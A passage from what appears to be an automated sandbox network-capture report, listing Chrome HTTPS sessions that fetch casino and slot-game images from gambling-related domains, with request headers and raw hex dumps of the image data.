                                                                                                                                                          Data Ascii: f*jGQ~ x<o9-ub7Zl<=+'-%4[W3gOF(aOgr.1?!cn!#*T~
                                                                                                                                                          2024-06-09 22:41:23 UTC2816INData Raw: 28 d7 97 8c fc 41 c9 19 c7 5c 7e f2 68 4c de 69 50 9c 91 06 5d fe 6f 98 56 d6 f3 3c c0 24 df 6d db fe 7b ee d6 9e 19 9f 87 f8 e5 5c 81 2f 67 2c eb 0f 94 1b 77 1c 18 45 b3 ca f2 83 5e e2 3f 2c 98 f6 03 b7 61 d9 6d ba 53 0b 19 17 d2 1d 56 46 a1 63 37 6f a7 13 f1 f1 45 4f bc 63 f6 eb 1c cf 19 9d 66 c1 78 97 1d ae bb 85 9e 1c 07 0b 76 bb 94 d3 6f 64 17 58 4b 6e bb d9 40 a9 e8 4d 08 6c 3f c4 29 ca 2f 9b 1f 79 07 9f 6a c8 ce bc 95 dd 01 3a 39 61 f3 2a ee 6d 1a e0 6e 3e d3 58 19 5e 82 0c 6d 98 8f da 05 21 dc c8 10 f1 d6 57 20 6a a1 7e ab 36 d5 d4 58 9d a3 d8 2a 2d 89 9c 7d 39 5c 5d e4 bb 92 f8 54 a7 32 37 52 fe 48 5c bb ec 6a 95 7d 7d 12 fe 75 2f 5e ca 9f 26 e6 ea 66 9e f7 53 fd c2 1d f8 ff 00 17 1d 58 4e 1f ac 89 e5 79 71 f7 32 f9 02 d1 d9 73 87 96 2d b6 c9 6f
                                                                                                                                                          Data Ascii: (A\~hLiP]oV<$m{\/g,wE^?,amSVFc7oEOcfxvodXKn@Ml?)/yj:9a*mn>X^m!W j~6X*-}9\]T27RH\j}}u/^&fSXNyq2s-o
                                                                                                                                                          2024-06-09 22:41:23 UTC3697INData Raw: de 4c 68 8b 79 7b 5b 77 90 f1 f9 70 6c 52 f2 a2 95 47 21 9b 63 cd 27 ce df 6c f3 3d d7 c8 f7 6e 00 e5 25 68 64 72 23 19 19 31 c3 3c 81 77 ee 16 13 ac 8d 2c c5 d8 24 4c c0 b2 5d 46 e4 85 09 4e 81 6e 4e 21 87 ee de 3d ba 19 2e 32 fe 35 95 d9 f1 8c 17 c8 8c d5 fb 55 be 24 1c 79 38 14 fb a6 49 b4 f7 48 cf cb b0 cb 72 54 5b 0e 4d 12 dd 8e de 1d 54 a6 94 b5 4d 53 13 5d 8a eb e5 d5 75 ea fe 1b 2d fb 6b 3b 8f c0 e4 be f3 03 e4 66 71 b0 6e 69 1e 41 90 a9 16 62 b0 59 00 1b e2 2f 24 00 2b 01 e5 06 89 64 54 b6 9b 33 9b 86 5e 77 13 3f 90 c0 8e 2c 85 83 0f 91 9c 84 8d 23 68 19 a4 c3 65 bc 64 9d 92 88 d2 62 59 58 f9 bb 25 31 b3 ee b1 ad 97 2c a7 08 bf e5 be 79 3c 72 1c 86 d5 02 42 77 73 25 b2 e7 d8 94 8c 3b 2a b0 de f0 99 bb 97 00 5d a3 da ed 6f c5 76 d1 99 bb 29 99 b1
                                                                                                                                                          Data Ascii: Lhy{[wplRG!c'l=n%hdr#1<w,$L]FNnN!=.25U$y8IHrT[MTMS]u-k;fqniAbY/$+dT3^w?,#hedbYX%1,y<rBws%;*]ov)


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          673192.168.2.55044943.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC370OUTGET /pc/image-pc/video/lebo_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC346INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          ETag: "5ab34b0d-4600"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          Content-Length: 17920
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 9490875703733859269
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC2507INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:23 UTC8192INData Raw: 1b 50 07 36 84 e9 8f c9 62 60 c9 97 1f 12 17 9c 7a 7a d7 ea e6 64 52 92 f8 78 12 9b 36 53 6d d7 eb 55 b2 e5 68 be 3d 71 f8 fc 9c 60 ce e4 54 eb b2 ca 84 28 4e ac 2d a8 cc 14 05 ad 4e 36 45 d0 b2 74 07 ee aa 95 81 47 43 71 d2 1a 9a f3 de 83 20 26 25 b7 03 cf 96 d0 a4 59 a5 2f 71 00 2e c5 3a 5c 0a b3 58 8b c2 33 48 ef ee a9 31 f3 11 de e6 0e 66 1c 92 1c c7 36 8d b8 e4 30 90 17 aa 42 4a 56 92 7a 6a 75 07 5a 03 56 cd a9 e3 2b 2c 37 0e 74 66 6c dc ff 00 ab 6e 46 4b 6b 18 e7 7b a6 3c 74 fc 54 d9 4a 08 24 74 f3 6b 7a 09 92 d6 bd aa 52 83 d9 18 82 46 dd aa 1c 80 f3 78 39 4f 7a 7d ea 8c 82 a5 ae e4 15 0f de 42 4a 75 e9 a9 a4 65 a2 e0 f3 a2 ce 4a 4e 1b 72 54 c2 b1 88 97 3f 1a ac 26 1d f6 5c 2a de 32 12 02 fb 68 71 1a f9 5c ba 85 b4 23 5a d9 28 4c 0b 48 5c f2 49 23
                                                                                                                                                          Data Ascii: P6b`zzdRx6SmUh=q`T(N-N6EtGCq &%Y/q.:\X3H1f60BJVzjuZV+,7tflnFKk{<tTJ$tkzRFx9Oz}BJueJNrT?&\*2hq\#Z(LH\I#
                                                                                                                                                          2024-06-09 22:41:24 UTC2912INData Raw: 55 a3 c3 fd ab fa c9 e1 58 97 f8 de 3b 89 b7 94 e2 32 c9 f5 9c 3b 37 37 07 93 c5 b9 ba f7 ff 00 0d 2a 52 c3 77 26 e4 b6 52 49 f1 ad 74 28 67 a9 47 08 0f 1d c4 c4 8e d1 2b 8d 9f d6 b8 6b 39 50 55 95 53 1a a2 e9 c2 35 21 31 fd 68 c4 3f 65 d4 c4 7b 65 f5 73 8e 66 63 3c 4b db 2c 1f 00 56 49 95 b1 90 9d c6 95 81 83 31 d6 96 2c a4 09 9e ad 72 1b 49 1e 0d b8 91 f7 d1 75 59 d8 83 82 02 2f f9 b8 41 ed bb f6 92 ff 00 d5 f8 76 a1 06 be 62 75 58 b8 15 3a d9 44 1f 83 84 44 f6 41 5e 46 f7 07 db ce 6d ed b6 71 9c 2f 3e c4 ab 11 9b c8 45 4e 49 b6 17 26 3c b5 38 c3 ae b8 d8 74 b9 1d d7 93 75 2d a5 8b 15 5f 4b db 51 5c 7a f4 2a 51 93 54 0c 4d bb d7 b9 d2 f5 4c ae a3 48 d4 ca cb 14 01 c3 71 8b 10 01 66 90 1b 08 e4 48 b4 95 d2 50 f2 3f f4 f9 df f2 ee ff 00 50 d7 6f 86 be f5
                                                                                                                                                          Data Ascii: UX;2;77*Rw&RIt(gG+k9PUS5!1h?e{esfc<K,VI1,rIuY/AvbuX:DDA^Fmq/>ENI&<8tu-_KQ\z*QTMLHqfHP?Po
                                                                                                                                                          2024-06-09 22:41:24 UTC2776INData Raw: bb b9 54 40 86 0f e0 69 4d 20 b8 bf 92 5b 4a 4a 8f e8 ab 1c 35 a5 fa ad 1f 37 0f 02 af c6 fa f7 af e6 7c f5 4f 29 2c 17 72 99 df 2f 1d e2 b1 31 50 97 d3 35 96 61 08 24 1f 16 d8 da 49 fb c1 ab fc 37 a5 7a ad 1f 37 0f 02 af c6 da f9 fe 3f 33 e7 aa 79 4b 5e 33 8c 62 d8 98 59 9c fe 47 35 93 71 0b 71 4d ad 0e c3 8a 36 9b 28 20 24 25 37 f8 0d d4 27 87 34 af 55 a3 e6 e1 e4 ab 1c 6d af fa fe 67 cf 54 f2 91 59 3c 07 13 39 a0 b5 3b 37 15 25 57 2a f4 72 dd 28 4f c0 6d 74 ac 12 07 5f 9d 5f e1 cd 2f d5 68 f9 b8 78 15 7e 35 d7 ff 00 fb 0c cf 9e a9 e5 24 dc 97 b5 99 92 95 8c 6f 27 54 a4 28 10 63 cc ee 22 e0 f8 15 20 a8 1f d1 4d a5 a0 e9 b4 a6 27 0c b5 21 20 41 04 53 88 20 8b 88 2d 61 1b 0a 55 7e 2e d6 eb d3 95 3a 99 ec c4 a1 20 44 a2 6a d4 31 94 48 62 08 32 62 08 b0 83
                                                                                                                                                          Data Ascii: T@iM [JJ57|O),r/1P5a$I7z7?3yK^3bYG5qqM6( $%7'4UmgTY<9;7%W*r(Omt__/hx~5$o'T(c" M'! AS -aU~.: Dj1Hb2b
                                                                                                                                                          2024-06-09 22:41:24 UTC1533INData Raw: ea 4a 94 b1 42 c3 cc 0d fc ea 64 6f 71 79 3c 0e 41 8f e4 f8 f7 31 98 ac d6 2d a7 59 86 f4 0c 46 36 23 21 0f 21 6d 39 be 33 11 90 cb 85 48 71 49 ba d0 4d be c1 55 2c 95 39 40 c2 4e 41 df 29 1e e9 2f da 56 33 95 23 31 30 c0 8d d1 03 b8 03 2e cd 7b 97 ca 22 e7 31 3c 92 03 98 cc 56 63 06 56 ac 74 ac 6e 23 19 09 29 2e 24 a5 45 6d 46 8a db 6e 9b 12 07 71 2a b7 85 43 91 a6 60 60 5c 83 7b ca 47 be 5c 76 15 8c f5 41 31 30 c0 8b 98 44 77 87 7d 0d e4 1c e3 90 f2 58 90 b1 f9 39 31 9b c6 e3 d6 e3 b0 f1 78 f8 51 31 b1 10 eb b6 0b 77 d3 c2 65 86 ca d4 00 05 65 3b ac 2d 7b 51 d1 ca 42 91 26 20 b9 da 49 91 ed 92 4a 5d 6c dc ea 80 09 0c 36 00 00 ed 00 02 2c af 75 f9 e2 d9 d8 73 4d 7a cf 4a 21 7e 7e 20 c2 19 7f 4e 13 b3 b7 f9 a8 63 d6 db 67 93 fb 6f c3 e5 fc 3a 50 0d 3e 88
                                                                                                                                                          Data Ascii: JBdoqy<A1-YF6#!!m93HqIMU,9@NA)/V3#10.{"1<VcVtn#).$EmFnq*C``\{G\vA10Dw}X91xQ1wee;-{QB& IJ]l6,usMzJ!~~ Ncgo:P>


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          674192.168.2.55045490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC379OUTGET /pc/image-pc/index/312/nav/casino/02.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 40838
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:45 GMT
                                                                                                                                                          ETag: "5d71fe7d-9f86"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[2],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE25[3],EU-FRA-paris-GLOBAL1-CACHE30[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465102
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: ecee5d61218f2c7471aeb62f35d094a9
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126901
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC15767INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8b 00 00 00 8b 08 06 00 00 00 51 19 6a ff 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 80 00 49 44 41 54 78 da ec fd 77 b8 5c c7 71 e7 8d 7f ba 4f 98 3c 37 47 00 17 39 27 82 60 26 45 30 4a 24 95 ad 44 51 39 67 cb 69 1d 76 bd 96 5e 7b d7 f6 3a bf 56 ce 54 a6 a2 25 51 a2 98 41 82 04 03 88 40 22 e7 70 73 9e 3c 73 52 77 ff fe 38 73 01 50 92 25 51 94 bd fb fc f6 6d 3e c3 7b 71 9f 99 39 e7 74 57 57 55 57 7d eb 5b 82 ff cd 43 22 9f d7 e7 35 fa f9 df 44 72 29 57 be f5 9f bb 8b f9 15 07 46 2d bb d3 c6 d0 ef d7 2a dd
                                                                                                                                                          Data Ascii: PNGIHDRQjgAMAa cHRMz&u0`:pQ<bKGDCIDATxw\qO<7G9'`&E0J$DQ9giv^{:VT%QA@"ps<sRw8sP%Qm>{q9tWWUW}[C"5Dr)WF-*
                                                                                                                                                          2024-06-09 22:41:23 UTC16384INData Raw: 2a 85 52 0a 29 a5 be 6e cb 35 db 8f bb 3b 5b 6d 44 fb a2 a5 0b 27 dd 64 22 42 0a 34 1a a3 0c 5e d0 b0 4f 9c 39 7d 61 61 7c 6c 41 de e8 dc f1 bd cf a8 b0 ee d5 5a ba 7b 2a 57 bf e4 e5 8f 2d 5c 38 7f e8 f8 c4 c9 79 1b 97 2e 94 53 63 13 78 5e 40 2e df 49 7b 6b 3b 9e 5f 63 7c b6 84 ad 20 6b 49 b1 62 de 52 fa 5b 7b 99 b0 87 28 9a 3a a7 ca b3 9c 39 56 61 f8 d1 31 dc 4c 9a 52 a5 4e 64 c0 11 06 6c 8b aa 0a d0 96 c0 72 12 1c 3a 74 18 91 74 59 b1 6e 0d a9 4c 8e b1 c1 41 1a c5 22 7d 2d ed cc 4b 5b 24 c7 06 d1 47 5c 91 ec e9 83 54 7e d4 d2 b6 ae d6 eb 28 34 8e 9d f8 8d 13 89 bf 5a 62 f4 2a 08 1f 8d 8b 11 7d 74 e4 6b df 09 4f 95 a7 8f 4f ee ff ce d7 1b 78 b3 20 1a 71 57 36 69 ce eb 48 33 67 97 02 66 86 76 97 16 ae ba 38 41 94 12 36 0d 1b 84 d3 ee d5 a7 4b b8 0a ea 26
                                                                                                                                                          Data Ascii: *R)n5;[mD'd"B4^O9}aa|lAZ{*W-\8y.Scx^@.I{k;_c| kIbR[{(:9Va1LRNdlr:ttYnLA"}-K[$G\T~(4Zb*}tkOOx qW6iH3gfv8A6K&
                                                                                                                                                          2024-06-09 22:41:23 UTC8687INData Raw: a1 91 71 ea 72 79 0a b9 22 ae eb cd 06 d9 4e 8d 04 c0 95 12 ad 14 b9 4c 86 86 c6 46 3a e6 75 20 f1 28 57 2a 5f fd ab bf fd cb 8f fc c5 17 fe 57 ea 01 9c 66 d6 bd fb a6 8e 23 cf f5 95 07 9f 7c 78 62 de 8a 93 8e 8c 8b c6 57 2c 3c ff 62 3d f8 cc 2f c7 46 76 3c 60 30 93 08 5c ac ab d3 93 41 68 c8 64 98 bb 66 43 30 91 6d fb ca 80 d7 f8 c7 61 dd 82 6b bc fa 13 df 75 f2 19 eb 8b bd db 1f 7c 0c 35 91 02 d2 70 b1 56 ce ee bd 78 21 3c ea 05 ae a2 46 6f e1 22 e5 ff 19 ee 22 53 d7 84 87 4c 9b 08 5a 41 30 9e 72 ce 45 43 72 6c f8 e0 2f 1f ff da 97 46 29 e4 e4 86 0f be ff f2 b2 36 73 91 8d 20 eb d0 64 81 34 80 cd e7 ea ed 39 e7 6c f8 49 35 a8 de 35 fb e2 b6 16 43 a5 83 d9 38 35 b1 87 f6 a6 e6 d1 d5 a7 ac 0c 93 44 31 36 3e c6 74 b9 4c 35 0a 49 b4 22 d1 0a 2f e3 11 25 31
                                                                                                                                                          Data Ascii: qry"NLF:u (W*_Wf#|xbW,<b=/Fv<`0\AhdfC0maku|5pVx!<Fo""SLZA0rECrl/F)6s d49lI55C85D16>tL5I"/%1


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          675192.168.2.55045518.66.147.914434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC566OUTGET /ocs/cc.png?1717972881233 HTTP/1.1
                                                                                                                                                          Host: ocsapi-aws.bakeddove.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://43370d.top
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://43370d.top/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:24 UTC486INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 332
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          Via: 1.1 b47ba5841a54cf2d19fc521c78e94514.cloudfront.net (CloudFront)
                                                                                                                                                          X-Amz-Cf-Pop: FRA60-P4
                                                                                                                                                          X-Amz-Cf-Id: R4p34h1pm7DUE4GQWdsx3P7fQ4VAAPQn7Fd9ECWxahdwIKtWqc9oiA==
                                                                                                                                                          2024-06-09 22:41:24 UTC332INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff c0 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93
                                                                                                                                                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          676192.168.2.55045890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC652OUTGET /pc/image-pc/index/383/login/icon2.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1205
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:19 GMT
                                                                                                                                                          ETag: "64bf926b-4b5"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[3],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE29[4],EU-FRA-paris-GLOBAL1-CACHE30[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467535
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 859e37d214619188459a5e1f2c863406
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124465
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC1205INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0b 00 00 00 0e 08 06 00 00 00 f9 61 e6 95 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDRatEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          677192.168.2.55046123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC605OUTGET /pc/image-pc/index/382/slot/10043.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1877
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:16 GMT
                                                                                                                                                          ETag: "64c0a20c-755"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[3],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE14[3],EU-FRA-paris-GLOBAL1-CACHE6[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473788
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: e28e2ec509bf2d8d038335047115449b
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118212
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
